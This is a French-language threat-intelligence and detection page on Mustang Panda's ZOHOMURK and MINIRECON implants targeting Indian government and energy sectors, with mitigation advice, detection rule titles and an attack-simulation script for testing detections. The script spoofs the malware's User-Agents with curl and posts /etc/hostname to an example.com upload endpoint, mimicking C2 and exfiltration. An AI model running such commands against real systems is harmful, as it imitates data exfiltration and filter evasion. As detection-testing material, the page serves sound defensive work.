Mustang Panda utilise ZOHOMURK et MINIRECON contre les secteurs gouvernementaux et énergétiques de l’Inde
Detection stack
- AIDR
- Alert
- ETL
- Query
Résumé
Mustang Panda mène des opérations d’espionnage ciblant le gouvernement indien et les secteurs de l’hydroélectricité. Le groupe utilise un ensemble d’outils malveillants mis à jour incluant SHARDLOADER, MINIRECON et ZOHOMURK. L’une de ses techniques notables est l’abus de Zoho WorkDrive pour le commandement et le contrôle ainsi que l’exfiltration de données.
Investigation
Acronis TRU a identifié deux campagnes parallèles qui utilisaient des appâts de spear-phishing autour de la coopération Inde-Taïwan. Les chercheurs ont découvert le chargement de DLL via les binaires légitimes de Solid PDF Creator et ont analysé les nouveaux implants ZOHOMURK et MINIRECON. L’enquête a également été menée en coordination avec CERT-In pour soutenir les actions défensives.
Atténuation
Les organisations devraient surveiller les activités inhabituelles impliquant les plateformes cloud, en particulier l’utilisation non autorisée de Zoho WorkDrive. Les solutions EDR et XDR devraient être configurées pour détecter le chargement de DLL et la persistance suspecte basée sur le registre. Il est également essentiel d’avoir une visibilité sur les processus non-navigateurs établissant des connexions HTTPS ou WebSocket vers des services cloud.
Réponse
Si cette activité est détectée, les systèmes affectés doivent être isolés immédiatement pour stopper toute exfiltration supplémentaire via les API cloud. Les enquêteurs devraient réaliser une analyse forensic sur les chemins de staging tels que C:ProgramDataIDMlogs or %LOCALAPPDATA%MicrosoftVaultCache. Les clés Run du registre et les tâches planifiées doivent également être examinées pour une persistance non autorisée.
Flux d’Attaque
Détections
Tâche planifiée suspecte (via audit)
Voir
Points de persistance possibles [ASEPs – Software/NTUSER Hive] (via registry_event)
Voir
Fichiers suspects dans le profil public de l’utilisateur (via file_event)
Voir
Détection de la communication C2 de Mustang Panda MINIRECON et ZOHOMURK [Connexion réseau Windows]
Voir
Détection de commande et de contrôle Mustang Panda ZOHOMURK [Proxy]
Voir
Détection des mécanismes de persistance de Mustang Panda dans les attaques du secteur indien [Événement du registre Windows]
Voir
Exécution de simulation
Prérequis : La vérification préliminaire de télémétrie et de ligne de base doit avoir réussi.
Raisonnement : Cette section détaille l’exécution précise de la technique de l’adversaire (TTP) conçue pour déclencher la règle de détection. Les commandes et le récit doivent refléter directement les TTPs identifiés et viser à générer la télémétrie exacte attendue par la logique de détection. Des exemples abstraits ou non liés conduiront à un mauvais diagnostic.
-
Narration et commandes de l’attaque : L’adversaire a réussi à établir un point d’ancrage et tente d’initier des communications de commande et de contrôle (C2). Pour se faire passer pour du trafic commercial légitime, l’implant ZOHOMURK essaie de communiquer avec son contrôleur en imitant les appels API de Zoho WorkDrive. L’attaquant utilise une chaîne User-Agent spécifique et codée en dur (
Zoho Client/1.0) pour passer à travers certains filtres réseau, espérant se fondre dans le trafic de productivité cloud légitime. Cette action générera une entrée de journal de proxy contenant le User-Agent cible, déclenchant ainsi la règle de détection. -
Script de test de régression :
#!/bin/bash # Simulation de C2 ZOHOMURK via falsification de User-Agent # Cible 1 : Imitation de Zoho Client echo "[+] Simulation ZOHOMURK : Zoho Client/1.0" curl -A "Zoho Client/1.0" http://example.com/api/v1/sync # Cible 2 : Imitation de IPFetcher echo "[+] Simulation ZOHOMURK : IPFetcher/1.0" curl -A "IPFetcher/1.0" http://example.com/checkip # Cible 3 : Imitation de Multipart POST User-Agent echo "[+] Simulation ZOHOMURK : Multipart POST" curl -X POST -A "Multipart POST" -F "data=@/etc/hostname" http://example.com/upload -
Commandes de nettoyage :
# Aucun artefact persistant n'est créé sur le système par cette simulation basée sur le réseau. # Assurez-vous simplement qu'aucun processus curl en arrière-plan ne soit en cours. pkill curl